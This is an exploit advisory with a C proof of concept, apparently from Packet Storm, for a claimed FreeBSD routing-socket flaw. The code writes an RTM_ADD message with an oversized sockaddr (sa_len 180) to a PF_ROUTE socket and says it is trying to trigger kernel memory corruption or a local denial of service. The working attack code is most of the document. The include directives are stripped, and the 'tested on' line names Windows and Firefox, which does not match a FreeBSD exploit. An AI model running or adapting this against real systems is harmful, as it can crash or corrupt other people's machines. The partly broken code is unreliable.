=============================================================================================================================================
| # Title : FreeBSD Routing Socket Input Validation Analysis – Oversized sockaddr in RTM_ADD |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.freebsd.org/ |
=============================================================================================================================================
[+] Summary : PoC attempts to test the robustness of the FreeBSD routing socket subsystem by crafting a RTM_ADD message containing an intentionally oversized sockaddr structure (sa_len greater than the traditional sockaddr_storage limit of 128 bytes).
4 you https://packetstorm.news/files/id/216124/
[+] POC :

/* NOTE(review): the header names after each #include were lost when this page
 * was extracted (angle-bracketed text stripped), so these directives do not
 * preprocess as shown; restore them from the original advisory. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Round a sockaddr length up to the next multiple of sizeof(long); a zero
 * length yields one full word. Used below as the stride between the two
 * sockaddrs in the message and in the msglen computation. The macro evaluates
 * its argument more than once, so only pass side-effect-free expressions. */
#define ROUNDUP(a) \
    ((a) > 0 ? (1 + (((a) - 1) | (sizeof(long) - 1))) : sizeof(long))

/* Mirrors the BSD sockaddr prefix (sa_len, sa_family) but carries a 254-byte
 * payload, so sa_len can be set well above the 128-byte sockaddr_storage
 * limit the summary above refers to. */
struct malicious_sockaddr {
    unsigned char sa_len;
    unsigned char sa_family;
    char sa_data[254];
};

/*
 * Builds a single RTM_ADD routing message whose destination sockaddr claims
 * sa_len = 180 and writes it to a PF_ROUTE socket.
 *
 * Returns 1 if the routing socket cannot be opened, 0 otherwise. The result
 * of the write() is only printed, not reflected in the exit status.
 *
 * Defender's note: the kernel-side property being probed is, as the summary
 * states, that sa_len is bounded before the address is copied into fixed-size
 * kernel storage; a write() error is the expected outcome on a kernel that
 * enforces that bound. Acceptance of the message alone does not demonstrate
 * a vulnerability (see the final printf).
 */
int main()
{
    int s;
    char buf[1500];                        /* header plus both sockaddrs fit well within this */
    struct rt_msghdr *rtm;
    struct malicious_sockaddr *dst, *gw;
    int l;                                 /* unused */

    printf("[+] FreeBSD CVE-2026-3038 Local DoS PoC\n");

    s = socket(PF_ROUTE, SOCK_RAW, AF_UNSPEC);
    if (s < 0) {
        perror("[-] socket(PF_ROUTE) failed");
        return 1;
    }

    /* Zeroed buffer, routing header first. */
    memset(buf, 0, sizeof(buf));
    rtm = (struct rt_msghdr *)buf;
    rtm->rtm_msglen = 0;                   /* filled in once both sockaddrs are laid out */
    rtm->rtm_version = RTM_VERSION;
    rtm->rtm_type = RTM_ADD;
    rtm->rtm_addrs = RTA_DST | RTA_GATEWAY; /* two sockaddrs follow: destination, then gateway */
    rtm->rtm_flags = RTF_UP | RTF_GATEWAY | RTF_STATIC;
    rtm->rtm_pid = getpid();
    rtm->rtm_seq = 42;

    /* Destination sockaddr directly after the header. sa_len = 180 exceeds the
     * 128-byte limit while sa_family still says AF_INET; 170 of the 254
     * payload bytes are filled (sa_len also counts the two prefix bytes). */
    dst = (struct malicious_sockaddr *)(rtm + 1);
    dst->sa_family = AF_INET;
    dst->sa_len = 180;
    memset(dst->sa_data, 'A', 170);
    int dst_space = ROUNDUP(dst->sa_len);   /* stride implied by the oversized sa_len */

    /* Gateway sockaddr placed at that stride: an ordinary AF_INET sockaddr_in
     * with a loopback address, so only the destination entry is malformed. */
    gw = (struct malicious_sockaddr *)((char *)dst + dst_space);
    gw->sa_family = AF_INET;
    gw->sa_len = sizeof(struct sockaddr_in);
    ((struct sockaddr_in *)gw)->sin_addr.s_addr = inet_addr("127.0.0.1");

    /* Total length = header + rounded destination + rounded gateway. */
    rtm->rtm_msglen = sizeof(struct rt_msghdr) + dst_space + ROUNDUP(gw->sa_len);

    printf("[*] Sending packet: msglen=%d, dst->sa_len=%d\n", rtm->rtm_msglen, dst->sa_len);
    printf("[!] Attempting to trigger kernel memory corruption...\n");

    /* A failed write() (errno reported via strerror) means the kernel rejected
     * the message; a successful write() only means it was accepted. */
    if (write(s, buf, rtm->rtm_msglen) < 0) {
        fprintf(stderr, "[-] Result: %s\n", strerror(errno));
    } else {
        printf("[+] Packet accepted. If the system is vulnerable, it might crash now.\n");
    }

    close(s);                              /* return value not checked; nothing was written through it */
    return 0;
}

Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================